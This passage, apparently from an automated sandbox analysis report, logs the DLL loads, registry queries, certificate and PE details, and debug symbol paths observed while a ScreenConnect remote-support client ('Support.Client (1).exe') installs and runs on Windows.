Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: wkscli.dll

Source: C:\Users\user\Desktop\Support.Client (1).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Reads internet explorer settings

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

PE / OLE file has a valid certificate

Source: Support.Client (1).exe

Static PE information: certificate valid

PE file contains a mix of data directories often seen in goodware

Source: Support.Client (1).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Support.Client (1).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Support.Client (1).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Support.Client (1).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Support.Client (1).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Support.Client (1).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Support.Client (1).exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains a debug data directory

Source: Support.Client (1).exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Support.Client (1).exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA027B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA02D2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA04B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF61000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.1932080975.0000000001722000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3504545474.0000000002941000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2894133080.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2893684793.0000000001150000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1927774775.0000000000B2D000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA02DE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF6D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1944029579.000000001C132000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA02DE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF6D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1944029579.000000001C132000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000006.00000000.1922315204.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF65000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA02D6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1934412398.0000000002F92000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000006.00000000.1922315204.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
